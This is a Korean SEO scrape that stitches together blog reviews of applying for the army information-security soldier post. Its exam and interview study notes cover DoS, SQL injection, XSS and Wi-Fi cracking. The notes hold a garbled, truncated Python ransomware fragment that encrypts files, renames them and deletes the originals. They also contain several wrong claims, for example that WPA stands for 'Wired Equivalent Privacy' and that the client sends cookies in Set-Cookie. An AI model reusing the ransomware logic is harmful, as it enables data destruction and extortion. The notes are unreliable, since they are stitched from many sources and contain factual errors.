정보 보호 병 후기 | 컴공은 꼭 군대를 여기로 가세요... (Feat. 정보보호병 / 소프트웨어개발병) 상위 269개 베스트 답변

당신은 주제를 찾고 있습니까 “정보 보호 병 후기 – 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병)“? 다음 카테고리의 웹사이트 https://you.charoenmotorcycles.com 에서 귀하의 모든 질문에 답변해 드립니다: https://you.charoenmotorcycles.com/blog. 바로 아래에서 답을 찾을 수 있습니다. 작성자 코딩하는거니 이(가) 작성한 기사에는 조회수 29,891회 및 좋아요 450개 개의 좋아요가 있습니다.

Table of Contents

정보 보호 병 후기 주제에 대한 동영상 보기

여기에서 이 주제에 대한 비디오를 시청하십시오. 주의 깊게 살펴보고 읽고 있는 내용에 대한 피드백을 제공하세요!

아래 상세 동영상 보기

d여기에서 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병) – 정보 보호 병 후기 주제에 대한 세부정보를 참조하세요

#정보보호병 #소프트웨어개발병 #컴퓨터공학 #군대

정보 보호 병 후기 주제에 대한 자세한 내용은 여기를 참조하세요.

육군 정보보호병 후기 – velog

육군 정보보호병에 지원해서 합격하게 되었습니다!저는 한림대학교 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람 …

+ 여기에 보기

Source: velog.io

Date Published: 9/4/2022

[INFORMATION GUARD] 정보보호병 합격 후기 02 – BLOG

[INFORMATION GUARD] 정보보호병 합격 후기 01 오늘 2021년 05월 27일 필자의 군대 입대 프로젝트를 마쳤다. 코로나 시대… 정말 군대 가기 힘들다.

+ 여기를 클릭

Source: alltime-it.tistory.com

Date Published: 6/6/2021

육군 정보보호병 지원 후기 – 면접 문항 및 질문 정리 (2021.01.28)

본인은 아직 입대는 커녕 합격도 하지 않은 평범한 대학생이므로, 두 병과에 대해 더 자세히는 잘 알지 못한다. ‘정보보호병 후기’와 같은 키워드로 검색 …

+ 더 읽기

Source: syphon.tistory.com

Date Published: 7/30/2021

정보보호병 면접 후기 – Security Study

서류전형에서 획득한 가산점은 다음과 같다. 정보보호학과 2학년 1학기 수료 = 16점. 고교 출석률 결석 0일 = 10점. KISA 추천 동아리 활동 1 …

+ 여기에 자세히 보기

Source: sf-jam.tistory.com

Date Published: 5/16/2021

정보보호병 후기 – 웹찢남

정보보호병 후기. harry595 2020. 9. 10. 01:25. 지난 포스팅에서 정보보호병 키워드로 검색을 해서 들어온 분들을 보고. 짧게나마 정보보호병 면접 부터 생활을 간단 …

+ 여기에 보기

Source: harry595.tistory.com

Date Published: 10/4/2021

[2020.06.15] 육군 정보보호병 면접 후기 – 사는 사람 이야기

지원 계기 정보보호병에 지원하기 전까지 나는 산업체를 알아보고 있었고 괜찮은 한 스타트업에서 병역특례를 받는 것을 조건으로 입사했었다.

+ 여기에 표시

Source: kaite-story.tistory.com

Date Published: 10/21/2022

2020.09.21 육군 정보보호병 면접 후기 – P&H_Station

코로나 사태로 인해서 2020.09.03이였던 정보보호병 면접이 2020.09.21로 미뤄지게 되었다. 이번 80회차 정보보호병은 14명을 모집하고, 1차 서류평가 …

+ 여기에 표시

Source: ludeno-studying.tistory.com

Date Published: 12/6/2021

2021.05.27 육군 정보보호병 2차(면접, 필기) 결과

다른 블로그도 보면 결과 발표일 아침 10시 쯤에 합격한 사람에게는 카톡으로 알림이 오는 것 같습니다. 후기. 저는 1차 때, 80명 중 51등으로 합격하여 …

+ 자세한 내용은 여기를 클릭하십시오

Source: filime.tistory.com

Date Published: 10/18/2021

주제와 관련된 이미지 정보 보호 병 후기

주제와 관련된 더 많은 사진을 참조하십시오 컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병). 댓글에서 더 많은 관련 이미지를 보거나 필요한 경우 더 많은 관련 기사를 볼 수 있습니다.

주제에 대한 기사 평가 정보 보호 병 후기

Author: 코딩하는거니
Views: 조회수 29,891회
Likes: 좋아요 450개
Date Published: 2019. 12. 3.
Video Url link: https://www.youtube.com/watch?v=wTaug1FfFrk

육군 정보보호병 후기

육군 정보보호병에 지원해서 합격하게 되었습니다!

저는 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람인데도 어느정도 상식을 쌓으니 합격시켜주었네요.

관련 지식은 네트워크관리사 2급이랑 정보처리기능사를 취득하며 어느정도 접해봤고, 그 외 문제를 좀 풀어보며 익히려고 노력했습니다.

합격 수기를 간단히 적어볼까 합니다.

과정

서류심사 (1차) 필기시험 (2차) 면접 (2차)

위와 같은 점수로 합격을 했습니다.

1차지원 같은 경우는 서류심사를 통해서 뽑고 2차는 대전충남지방병무청에 가서 필기시험과 면접 후에 최종 결과를 통보받을수 있었습니다.

서류에 관해서는 제가 딱히 드릴 말씀이 없습니다. 병무청 홈페이지에 들어가보시면 몇몇 자격증이 가선점을 주는데 저같은 경우는 동급 추가점수인 네트워크관리사나 정보처리기능사에 가산점이 붙고 다니는 학과에 추가점수를 받아 서류 34점으로 무난히 합격했습니다.

필기시험하고 면접을 준비한다고 상당히 애먹었는데 만약 정보보호병을 준비하시는 분들이 제 글을 본다면 조금 더 수월하게 준비할 수 있지 않을까 싶습니다.

필기 준비

필기는 무조건 정보보안기사 기출 풀어봐야 합니다.

보안기사에서 모든 문제가 다나옵니다.

기수가 틀려지면 모르겠지만 저같은 경우는 시험지에 10문제가 나왔고, 모두 보안 기사에서 한번씩은 본 문제들이여서 풀 수 있었습니다.

제가 보안기사 보면서 본 사이트 참조해드릴테니 다 보는건 현실적으로 무리가 있고 200문제 내지 300문제만 눈으로 훑어도 큰 도움이 되리라 확신합니다.

1~14회 보안기사 기출문제

다른 문제집 볼 필요 없이 계속 저것만 훑어보세요. 필기문제는 정말 저기서 갈라집니다.

평균적인 합격점수로 추론해봤을때 3~4문제 정도 맞추면 얼추 커트라인 이상으로 무난히 통과가 가능한 것 같습니다.

면접 준비

면접을 제가 참 고민을 많이 했습니다.

인터넷에 올라온 후기같은걸 보면 막 해킹기법 워터링 홀이 뭐냐, 브루트포스 어택을 아냐 이런씩으로 물어보시던데 이걸 그럼 다 외워가야하냐 생각이 막막했습니다.

면접은 총 두번에 걸쳐서 보는데, 한분은 군무원인거 같았고 한분은 대위이신것 같더라고요.

군무원 분은 만약 그룹간의 마찰이 생기면 어떻게 대처할 것인가, 또는 밤샘 근무할 일이 많을텐데 어떻게 대처할 것인가 이런 형식적인 질문을 하셨고 다수결에 따라서 어떻게 어떻게 할 것이다 라고 에둘러 대답하니 어찌저찌 넘어간 것 같습니다.

개인적인 생각으론 면접후에 핵심적인 질문은 대위님이 많이 하신 것 같았습니다.

대위님도 평범한 질문을 꽤 하셨는데, 그외에 제가 좀 핵심적으로 느낀 걸 꼽자면

로그를 아냐 아는 정보보안 장비가 있냐

이정도였습니다.

저는 막 복잡한 해킹기법 이야기하실줄 알고 준비를 꽤 많이 해갔는데 아쉽더라고요.

여기서 정말 임팩트있게 느낀건 아는 보안장비가 있냐는 질문이 나왔을 때 IPS랑 IDS를 말씀드리니 정말 눈이 틀려진 것 같았습니다. 간략히 설명하니 만족하셨던 것 같구요.

면접전에 공부한 이런 전문적인 지식을 내포하는게 핵심 포인트인 것 같습니다.

아래에 제가 면접 대비하며 정리해놓은 파일 기재할테니 참고하시면 좋을꺼같아요.

해킹 기법 정리

1.Syn/Ack Flood

코드출처: Normaltic

◉ client ack (클라이언트 데이터 보내기전 동기화 요청) ->server syn/ack(서버응답) -> client ack(클라이언트 응답)

◉ TCP접속을 성공시키기 위해 반드시 필요한 과정 – > 3way handshaking

◉ ack(응답)을 안보내니까 syn이 꽉차서 syn 백로그큐를 폭주시켜서 dinial of service 가 발생함

◉ FIN Flag를 이용한 4way handshaking 또한 존재

대응책

1.백로그큐 크기 늘림

2.신 쿠키 설정

3.방화벽에 임계치 설정

4.tcp 연결 과정 대기시간 줄임

DDOS 대응방안

◉ DOS공격이 맞는지 명확히 판단

◉ 형 파악 후 차단정책 근거 확보

◉ 차단정책 설정

◉ 공격대비/정책업데이트/좀비PC IP확보

◉ 막는법은 없고 서버 증설하거나 해당 ip를 서버에서 차단시킴 /서버 ip바꾸기/클라우드플레어

◉ 윈도우에서 iis(internet information service)에서 ip및 도메인 차단 들어가서 막기 시전

◉ 리눅스에서 root # route add -host [IP] reject

2.SQL Injection

Sql 질의문을 삽입하는 공격

◉ 정상 로그인

◉ 해커가 입력한 로그인

◉ where 절에서 and 조건은 or조건보다 선행되기 때문에 무조건 true값 리턴, 모든 데이터 출력되버림

◉ 대충 아이디 ~(SQL 질의문 추가)

◉ 정상적인 질의쿼리: select * from user where id=’[사용자ID]’

◉ 인젝션당한쿼리: select * from user where id=’[사용자ID]’~~~임의의 sql 구문

◉ blind/mass/union 등 다양한 변화형태 존재 blind->참거짓 리턴

◉ WAS(웹애플리케이션 서버) -> database

예: sql : {} 하나 사와

{} 빵

{} 빵 하나 사오고 건물 한채 계약해

DB에 임의의 SQL명령 실행(쉘까지 확보 가능)

DB의 데이터를 추출

인증 우회

DB 데이터 변조

◉ 악성 파일 업로드 가능 막는법: 쿼리와 관련된 코드를 죄다 필터링시켜서 시큐어 코딩

3.XSS Cross Site Scripting

진짜 간단히 말해서 이거.

대부분은 막아두지 근데 정말 보안 아예 안해둔 사이트는 안막아둠

보통은 이런씩으로 링크를 걸어서 알림창을 뜨게함

아스키코드로 위 실행명령을 변환시킨 뒤에 일부 웹서버는 필터링을 제대로 안해주므로 잘 통하는 경우가 있음

허점 즉, 취약점을 찾는 것이 중요함

워낙 변칙적이고 다 막기가 힘들어서 위험함

자바스크립트 형식으로 버튼/함수 응용가능

방지법

1.태그 써서 막기

2.필터링 등등..

xss 응용기법

◉ 칼리리눅스에서 xss를 응용한 BeEF 컨트롤 패널 등 사용가능

(browser exploitation framework project)

◉ 여기에 pretty theft 같은 기법이 있음( 홈페이지 똑같이 구현해서 가짜 홈페이지에 치게하고 로그따오는거)

4.RansomWare

import glob import os , random , struct from Cryptodome . Cipher import AES def encrypt_file ( key , in_filename , out_filename = None , chunksize = 64 * 1024 ) : if not out_filename : out_filename = in_filename + ‘.yankee’ iv = os . urandom ( 16 ) encryptor = AES . new ( key , AES . MODE_CBC , iv ) filesize = os . path . getsize ( in_filename ) with open ( in_filename , ‘rb’ ) as infile : with open ( out_filename , ‘wb’ ) as outfile : outfile . write ( struct . pack ( ‘ ‘ + filename ) encrypt_file ( key , filename ) os . remove ( filename ) for filename in glob . iglob ( startPath , recursive = True ) : if ( os . path . isfile ( filename ) ) : fname , ext = os . path . splitext ( filename ) if ( ext == ‘.enc’ ) : print ( ‘Decrypting> ‘ + filename ) decrypt_file ( key , filename ) os . remove ( filename )

5.WPA Crack

◉ 앞서 3 way handshake 가 세션을 연결하는 과정이었다면, 4 way handshake는 클라와 서버의 연결을 끊고 세션을 종료하는 과정임. 이 과정에서 해킹이 가능함

그 과정은 이러합니다.

◉ Fin wait -> close wait-> fin wait 2

◉ 여기서 time wait을 주는 이유는 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황이 발생할 수 있기 때문

◉WPA란?

Wired Equivalent Privacy의 약자로 유선랜에 상당하는 Privacy를 제공하기 위한 알고리즘

◉ WEP를 보완하는 암호화 방식

WPA Version1, Vesion2가 있음

◉ 여기서 사용된 Aircrack-ng는 디텍터, 패킷 스니퍼, WEP와 [Wi-Fi Protected Aooo ccess|WPA]/WPA2-PSK 802.11 무선 LAN에 대한 크래커와 분석 도구가 탑재된 네트워크 소프트웨어이다.

IPS란?

침입 차단 시스템(侵入遮斷 – ,영어:Intrusion Prevention Systems (IPS), Intrusion Detection and Prevention Systems (IDPS)) 또는침입 방지 시스템은 외부네트워크로부터 내부 네트워크로 침입하는 네트워크패킷을 찾아 제어하는 기능을 가진소프트웨어또는하드웨어이다.

IBM Proventia, 윈스 Sniper IPS, Cisco 파이어파워, 티핑포인트 등

IDS란?

침입 탐지 시스템(Intrusion Detection System, IDS)은 일반적으로 시스템에 대한 원치 않는 조작을 탐지하여 준다. IDS는 매우 많은 종류들이 존재하며, 여기서는 그들 중 일부를 설명한다. 시스템에 대한 원치 않는 조작은 악의를 가진 숙련된해커또는 자동화된 툴을 사용하는스크립트 키디에 의한 공격의 형태로 행해질 수 있다

스노트나 브로같은게 ids 예

문제

클라이언트에서 서버로 쿠키를 보낼 때 사용하는 HTTP 헤더는?

-> set-cookie와 cookie 등의 선지가 있었다.

set-cookie, 중간에 개인정보 탈취등을 방지하기 위해 세션등이 사용됨 다음 중 전자상거래와 관련이 없는 것은?-> ebXML, SET, SSL, EMV가 선지였다.

ssl은 인터넷 데이터 암호화 기술 chmod 명령어의 특징이 아닌 것은?-> 파일과 디렉토리를 rename할 수 있다는 선지를 선택했다. HTTP 오류 코드와 그 뜻을 알맞게 짝지은 것이 아닌 것은?

-> 200, 403, 404, 500이 나왔다. 다음 중 입력값에 대한 검증 / 특수문자 처리를 하지 않은 것과 무관한 공격 기법은?

-> injection 기법 두세 종류와 ‘watering hole’이 나왔다. ‘watering hole’을 골랐다. watering hole : 워터링 홀 공격이란 공격대상이 자주 방문하는 홈페이지를 사전에 악성코드에 감염시킨 뒤 공격대상이 접속 할 때까지 잠복하면서 기다린다. 그리고 공격대상이 접속하면 비로서 공격을 시도하는 수법이다. 홈페이지에 접속하는 모든 사용자를 공격하기 때문에 접속하는 모든 사용자가 공격의 대상이 될 수 있다

◉ xss크로스사이트스크립트, 스크립트엔진 취약점과도 연관있음

리눅스 방화벽에서 ping에 대한 응답으로 ‘destination unreachable’을 리턴하기 위해 설정해야 하는 플래그는?

-> DENY, REJECT 등이 있었다. REJECT를 골랐다. 다음 화면은 어떤 명령어의 실행 결과인가? (ping 실행 화면)

-> 답이 ping이다 ㅋㅋ 다음 중 IPS에 대한 설명으로 올바르지 않은 것은? (그냥 IPS가 아니라 어플리케이션 뭐시기 IPS이었는데 기억이 안난다) 침해 단계의 심각성?에 따라 나열할 때, 빈칸에 들어갈 단어들은? (emergency에서 debug까지 나열되어 있었다.)

-> alert, info 등이 있었는데, 그냥 영어 할 줄만 알면 나열 가능하다

◉ 사고 전 준비 과정]→[사고 탐지]→[초기 대응]→[대응 전략 체계화]→[사고 조사]→[보고서 작성]→[해결]
침입이 있는데, 없다고 판단하는 경우는 뭐라고 하는가? (True/False Positive/Negative 중 선택)-> False Negative라고 답했는데, 맞을지 모르겠다.

◉ 1번

전자서명과 관련없는 프로토콜을 고르시오.

1. DSA

2. KCDSA

3. ECDSA

4. A5/3

=> 답 : 4

dsa가 digital signature algorithm 이므로 dsa붙은거 고르면된다.

◉ 2번

DB 보안으로서 적절하지 못한 자세는? (문제설명이 똑같지는 않지만 취지는 동일하다.)

1. 관리자를 최소한으로 만든다.

2. 로컬 계정으로 접속하는 것을 금지

3. Guest 계정으로 접속하는 것을 금지

4. 기억 안나는데 답은 아니였음

=> 답 : 2

로컬 계정으로 접속하는게 안되면 뭐 다 안되지

◉ 3번

SIEM에서 사용되는 프로토콜로 적절하지 못한 것은?

1. Qrader

2. Arcsight

3. SPLUNK

4. beStorm

=> 답 : 4 (정답은 기억 안나는데 나머지 보기는 틀린 보기임)

siem = sim(보안정보관리) + sem(보안이벤트관리)

◉ 4번

공개키와 대칭키 알고리즘을 사용하여 키교환을 하는 방식에서 제 3자가 해당 공개키를 인증할 수 있는 시스템은?

(문제설명이 똑같지는 않지만 취지는 동일하다.)

1. 키 분배 인증 센터

2. RSA ->공개키 암호시스템

3. Diffie Hellman

4. 기억 안남

=> 답 : 1

◉ 5번 문제 기억 안남

◉ 6번

파일 시스템 내에서 파일이나 디렉토리의 고유한 번호, 블록 정보 등이 담겨있는 파일은?

1. boot

2. data

3. i-node

4. 기억 안남

=> 답 : 3

◉ 7번

멀티 쓰레드나 멀티 프로세스에서 공유 자원을 여러 실행흐름이 접근하여 발생될 수 있는 취약점은?

1. buffer overflow 메모리 취약점 ->스택””은 해당버퍼에 할당된거보다 많이쓸때

2. Return to Library 라이브러리 함수 리턴

3. Race Condition ->상호배제,진행,한정대기

4. SQL Injection

=> 답 : 3

◉ 8번

웹 로그 파일에 기록되는 보기로 알맞지 않은 것을 고르시오.

1. IP 주소

2. 접속 시 Method

3. 접속 시 프로토콜

4. 접속 시 포트번호

=> 답 : 3 (정답이 정확하지는 않음 필자는 3번으로 적음)

◉ 9번

IDS가 수행되는 절차를 알맞게 배열한 보기를 고르시오.

=> 답 : [데이터 수집 -> 가공 -> 분석 -> 보고]

◉ 10번

TCP에서 4way HandShake의 연결 종료 과정에서 Seq와 ACK의 번호로 ㄱ, ㄴ, ㄷ, ㄹ에 알맞는 번호가 들어간 것을 고르시오.

=> 이 문제는 연결 종료 과정을 보여주면서 빈칸 기호와 번호가 일치하는 보기를 고르는 문제임. 답은 기억 안남

◉ strcpy 대신 strncpy를 사용하는 이유버퍼 오버플로우/scanf,getbyhostname등도 여기속함

◉ NMS가 확인할 수 없는 것호스트의 CPU 점유율

◉ 윈도우 공유 폴더 취약점(Null SessionIPC$

◉ TCP에서 클라이언트의 버퍼 오버플로우를 막기 위한 것흐름 제어

◉ crontab과 관련된 문제

◉ 사용자 인증 관련 문제최대 권한

◉ 다음 로그는 어떤 공격인가?랜드 공격(Land Attack)

◉ 디지털 포렌식에서 우선적으로 분석해야 하는 것레지스터

웹 대상으로 이루어지는 공격 시도를 막는 것웹 방화벽(WAF)

◉ 1. 파일 업로드 취약점을 묻는 문제 (단답식)

공격자는 서버 사이드 스크립트(PHP, JSP, .NET 등)을 이용하여 웹쉘(WebShell)을 제작

웹쉘(WebShell)은 원격에서 웹 서버를 제어하기 위한 목적으로 만들어졌으나, 지금은 웹쉘 = 악성코드라고 분류를 하여 안티 바이러스에서 탐지함

sql injection 과 다른점: 웹에서 노출되는 정보들을 하나씩 가져오는 sql injection 과 달리 파일 업로드 취약점은 웹쉘을 통해 시스템에 아예 침투하고 난 뒤 원하는 데이터들을 마음껏 가져오는 것

시큐어 코딩 – 소스코드 레벨 대응

◉ 2. 해시함수를 묻는 문제 (단답식)

임의의 길이를 갖는 임의의 데이터를 고정된 길이의 데이터로 매핑하는 함수를 말한다.

◉ 3. 메시지 인증코드를 묻는 문제 (단답식)

메시지 인증 코드(Message Authentication Code, 약칭 MAC)는메시지의 인증에 쓰이는 작은 크기의정보이다. MAC알고리즘은비밀 키를 입력받고, 임의-길이의 메시지를 인증한다.

◉ 4. 포맷 스트링 취약점을 묻는 문제 (답답식)

◉ 5. 운영체제 프로세스 상태 관련 문제 – 임계상태, 교착상태, 상호베재 등등 (객관식)

◉ 6. 포렌식 이미지 생성 프로그램을 묻는 문제 – nc, gz, tar, encase (객관식)

◉ 7. 로그 파일을 피해자 메일에 자동으로 전송하는 공격 프로그램을 묻는 문제 – 답 모름 ㅠㅠ (단답식)

◉ 8. VPN을 묻는 문제 (단답식)

◉ 9. OSI 7계층의 계층 중 설명에 대한 계층은 어느 계층인지 묻는 문제 (단답식)

면접준비

◉ CVE란 무엇입니까?

CVE(Common Vulnerabilities and Exposure)는 공개적으로 알려진 소프트웨어의 보안취약점을 가리키는 고유 표기를 뜻한

◉ APT 공격이 무엇입니까?

APT공격은 해커가 다양한 보안 위협을 만들어 특정 기업이나 조직의 네트워크에 지속적으로 가하는공격을 뜻한

◉ Zeroday공격이 무엇입니까?

제로 데이공격(또는 제로 데이 위협,Zero-DayAttack)은 컴퓨터 소프트웨어의 취약점을공격하는 기술적 위협으로, 해당 취약점에 대한 패치가 나오지 않은 시점에서 이루어지는공격을 말한다.

◉ 워러 크라이란 무엇입니까?

워너크라이(WannaCry) 또는워너크립트(WannaCrypt)[2],WanaCrypt0r 2.0는 2017년 5월 12일부터 등장한랜섬웨어멀웨어 툴이다. 2017년 5월 12일부터 대규모사이버 공격을 통해 널리 배포되었으며, 전세계 99개국의 컴퓨터 12만대 이상을 감염시켰다.[3][4]감염된 컴퓨터로는 20개의 언어로비트코인을 지급하면 풀어주겠다는 메시지를 띄웠다.

킬스위치 찾아냈고,방화벽이랑 인터넷 랜선꼽을때 유의하면 사전예방 가능

◉ 랜섬웨어란 무엇입니까?

랜섬웨어란 Ransom(몸값)과 Ware(제품)의 합성어로서 악성코드의 일종입니다. 해당 악성코드에 감염시컴퓨터 시스템에 접근이 제한되거나저장된 문서나 사진․동영상 파일이 암호화되어 사용할 수 없게 되며, 해커는 이에 대한 해제 대가로 금품을 요구합니다.

최근 이스라엘 보안 기업 만든 스파이웨어 페가수스가 애플뚫음

브루트 포스(무차별 대입 공격) 언급하며 그걸로도 몇백년 걸리는걸 뚫은게 대단하다고 생각함

기타 자료

TCP의 4-way Handshaking 과정
[STEP 1]
클라이언트가 연결을 종료하겠다는 FIN플래그를 전송한다. 이때A클라이언트는 FIN-WAIT상태가 된다.
[STEP 2]
B서버는 FIN플래그를 받고, 일단 확인메시지 ACK 보내고 자신의 통신이 끝날때까지 기다리는데 이 상태가

B서버의 CLOSE_WAIT상태다.
[STEP 3]
연결을 종료할 준비가 되면, 연결해지를 위한 준비가 되었음을 알리기 위해 클라이언트에게 FIN플래그를 전송한다. 이때 B서버의 상태는 LAST-ACK이다.
[STEP 4]
클라이언트는 해지준비가 되었다는 ACK를 확인했다는 메시지를 보낸다.

A클라이언트의 상태가 FIN-WAIT ->TIME-WAIT 으로 변경된다.

그런데 만약 “Server에서 FIN을 전송하기 전에 전송한 패킷이 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황”이 발생한다면 어떻게 될까요?

Client에서 세션을 종료시킨 후 뒤늦게 도착하는 패킷이 있다면 이 패킷은 Drop되고 데이터는 유실될 것입니다.

A클라이언트는 이러한 현상에 대비하여 Client는 Server로부터 FIN을 수신하더라도 일정시간(디폴트 240초) 동안 세션을 남겨놓고 잉여 패킷을 기다리는 과정을 거치게 되는데이 과정을”TIME_WAIT”라고 합니다. 일정시간이 지나면, 세션을 만료하고 연결을 종료시키며,”CLOSE”상태로 변화합니다.

방화벽과 ips/ids 차이

ips/ids 차이

◉ 패킷

패킷의 구성요소

1) 헤더(Header)동기 신호 플래그, 전송지 주소, 목적지 주소, 순차 번호 등패킷에는 프로토콜의 다양한 정보들이 헤더에 기록되는데, 프로토콜에 따라 다름.

2) 데이터(Data)데이터 부분에는 실제로 전송될 내용이 있음.

3) 트레일러(Trailer)수신 측에서는 전송 중에 데이터가 손상되었는지 알 수 있음.

예) 전송 에러 검사 항목 CRC(Cyclic Redundancy Check)

OSI 7계층

Ids 침입탐지유형

◉ NIDS (네트워크 침입 감지 시스템)

◉ 호스트 침입 탐지 시스템 (HIDS)

SQL과 Blind SQL의 차이는?

◉ Sql인젝션은 쿼리를 삽입해 원하는 데이터를 한번에 얻어냄

◉ Blind sql인젝션은 쿼리가 참일때와 거짓일때의 반응으로만 데이터를 알아냄

Setuid가 뭔가요

◉ 리눅스 특수권한 중 하나로 루트유저 엑세스 파일에 일반유저가 접근하게끔 허가

◉ 8진수 4000이 비트

◉ Setgid는 8진수 2000

◉ 커널에 내장된 툴로써 패킷 필터링, connection tracking

iptables

john the ripper

브루트포스

리눅스 설정 파일/ 임시파일/ 물리적 장치

etc/tmp/dev

퍼온 정보도 많습니다

혹시 원작자이시거나 불편하신 점이 있다면 댓글에 적어주세요

정보보호병이 나름 정예병이나, SW개발병에 비하면 나름 문턱도 작고 준비만 열심히 한다면 충분히 시도해 볼만한 보직인 것 같습니다.

필자도 보안에 관련해서는 모르는 부분이 정말 많지만, 적당한 공부를 통해 합격할 수 있었네요.

아직 훈련소도 들어가보지 못했고 사령부에 배치받을지 사단급에 배치받을지도 모르지만,

아무런 생각없이 군생활 하는 것보다 특기를 살려서 하는 편이 훨씬 낫다는 확신이 듭니다.

겁내지 말고 도전해보면 뭐라도 주는것 같아요 ㅋㅋ

앞으로 정보보호병을 하며 얻게된 경험이나 일 또한 기밀을 제외하고 기재할 기회가 있길 바랍니다.

[INFORMATION GUARD] 정보보호병 합격 후기 02

728×90

위 파트와 이어서 작성되는 글이며,

정보보호병 2차 시험의 관한 글이다.

만약에 이 글을 읽는 사람이 있으면 꼭 도움이 됐으면 좋겠다.

정보보호병 2차

정보보호병 2차 시험은 필기 및 면접이다.

병무청 도착 후 번호표를 뽑게 되는데 필자는 1시간 30분 정도를 일찍 도착했다.

하지만, 60/80 번 정도의 순서를 받았다.

필자가 시험을 본 당시에는 필기시험을 보는 장소와 면접을 보는 장소가

따로 있었으며,

필기 -> 면접 순으로 진행되었다.

필자는 부모님께서 데려다주셔서 정말 다행이었지만, 기차를 이용하는

분들은 조금 빨리 가서 번호표를 일찍 뽑아야 될 것 같다. (막차 끊기기 전에!)

정말 진심으로 급하신 분들은 앞으로 당겨주기도 하시는데,

웬만해서는 힘들 것 같다.

– 필기

솔직히 필기.. 필자의 입장에서는 정말 많이 어려웠다.

그 당시 블로그에 정리할 수 있도록 문제를 외웠는데,

시험이 끝나고 나니 다 까먹었다…

하지만, 이거는 정말 확실하다.
[시스템 지식] / [네트워크 지식] / [접근제어 지식]
이렇게 3 분야의 파트는 반드시 공부해야 한다.

저렇게 말해버리면 분야가 너무 넓은데.. 쉽게 정보보호 기사 시험을 준비한다고

생각하면 될 것 같다.

필자가 기억나는 문제는 시스템 해킹 기법을 설명해주고

해킹 기법 이름이 무엇인지 고르는 것

4-way-handshaking SYN과 ACK번호를 고르는 것이다.

필자는 기사시험 책을 구매해서 봤다.

솔직히 필자에게는 큰 도움이 되지 않았다.

공부도 열심히 하지 않았고, 기본지식으로 시험 봤기 때문이다.

(이런 마인드로 공부해서 시험이 어렵게 느껴졌나 보다..)

필자가 시험을 본 시기에는 총 10문제가 출제되었다.

볼펜으로 문제를 응시하며, 볼펜을 가져가지 않을 경우 시험실에서 제공해준다.

정보보호병 2차 필기는

정보보호기사 필기시험을 응시한다고

생각하자!

– 면접

면접은 기술면접과 인성면접으로 나눠져 있다.

필자 시기에는 1 대 1로 진행했다.

또한, 필자는 자소서를 위주로 면접을 준비했다.

그 이유는 필자 동아리 선배님들 중에 정보보호병에 합격하신

분들이 있었는데, 선배님들은 자소서 위주로 질문 받으셨다고 알려주셨다.

필자는 자소서를 보며, 필자가 직접 예상 질문을 만들어 봤다.

위 링크는 필자가 작성한 자료이다.

필자는 서치를 통해 인성면접에서 나올 수 있는 예상 질문들을 뽑아보고

예상 답변을 작성했다.

필자의 경우 기술면접 후 인성면접을 실시했다.
[기술면접]
솔직히 자소서 대로 안 물어봤다.

똑똑하고 들어가니 면접관님께서는 너무 힘드셨는지 눈도 안 마주치시고

다리 주무르고 계셨다.

필자는 힘드신 것을 눈치채고 또박또박 말하려고 노력했고,

필자에게 집중시키기 위해 노력했다.

먼저 들어가면 지원동기를 물어본다.

이후 필자에게는 해킹대회 경력이 있냐고 물어보셨다.

필자는 Defenit CTF 참여 해본적이 있다고 대답했고,

동아리 선배님께서 문제를 제일 빨리 푸신(퍼스트 블러드) 얘기를 했다.

해킹대회 이야기를 하니 면접관님 눈이 반짝해지셨다.

다음 질문그렇다면 또 다른 관심 있는 분야가 있을까요?

드디어 기회다!! 필자의 필살기를 던질 수 있는 기회

한 사람당 말할 수 있는 시간이 별로 없기 때문에, TMI 식으로 모든 필살기를 던졌다.

– 보안의 매력을 느끼기 시작한 포너블 언급

– 첫 해킹인 ARP SPOOFING을 말하며, 네트워크 언급

– 가고 싶은 회사는 토스이고, 직접 토스 보안팀 직원을 만나 얘기했으며,

이 과정에서 토스가 웹뷰인 것을 알았고, 웹 언급

– 토스도 웹뷰이지만, 모바일 서비스이기 때문에, 모바일 언급

크게 이 4 가지를 언급했으며, 기술 질문 모두 위 4 가지와

관련된 질문을 해주셨다.

이렇게 되면 너무 감사한 상황! 자신 있게 대답했다.

많은 질문을 주셨는데, 가장 기억에 남는 질문은

ARP SPOOFING과 관련된 질문이다.

면접관님께서는 직접 ARP SPOOFING을 만들어본 경험에 대해

물어보셨고, 필자는 프로젝트로 PYTHON으로 간단하게 프로그래밍

했다고 대답했다.

이와 더불어 필자가 진행한 다른 프로젝트도 언급할 수 있었다.

이렇게 되면, 필살기를 추가 어필할 수 있으며,

필자가 준비를 많이 했다는 것을 어필할 수 있고, 꼬리를 물고

필자에게 질문하게 만들 수 있다.

(꼬리 질문이지만, 필자가 경험한 대로 대답하면 되기 때문에 너무 유리한 상황)

면접은 “면접왕 이형” 유튜브 채널을 강력 추천한다.

뭔가 이 분 영상을 보고 이미지 트레이닝을 하면 잘할 것 같다는

자신감이 번쩍 든다.

이분 영상들을 잘 살펴보면 필살기를 던져 내가 말한 필살기에서 면접관이

질문할 수 있도록 하라고 강조한다.

여기서 말하는 필사 기는 본인이 했던 가장 잘한 프로젝트 및 활동 같은 느낌이며,

내가 말한 필살기에서 질문할 수 있도록 하여 면접 질문을 제한하는 방법이다.
[인성면접]
솔직히 서치를 해보니 가족관계의 대해 묻는다고 했다.

필자 시기에는 지원동기 및

“군대가 왜 있을까요?” / “본인 경험 중 힘들었을 때와 좋았을 때를 말해보세요”

3 가지 질문을 받았으며, 지원동기는 기술면접 때와 같이 말했다.

필자는 너무 당황스러워서 군대 존재 이유 질문에는

나라를 지키고 국민들을 보호하기 위해 존재한다고 대답했다.

자! 드디어 2 번째 질문

“본인 경험 중 힘들었을 때와 좋았을 때를 말해보세요”

인성면접이지만, 보안의 대한 질문을 하실 수 있게끔 하려고 했지만

그냥 네~ 하고 끝났다.

참고로 필자는 좋았을 때는 학교 프로젝트를 통해 동아리원들로부터

인정받았을 때를 말했고,

힘들었을 때는 항상 늘 긍정적으로 생각하기 때문에 없다고 평소보다

살짝 더 미소를 머금고 대답했다.

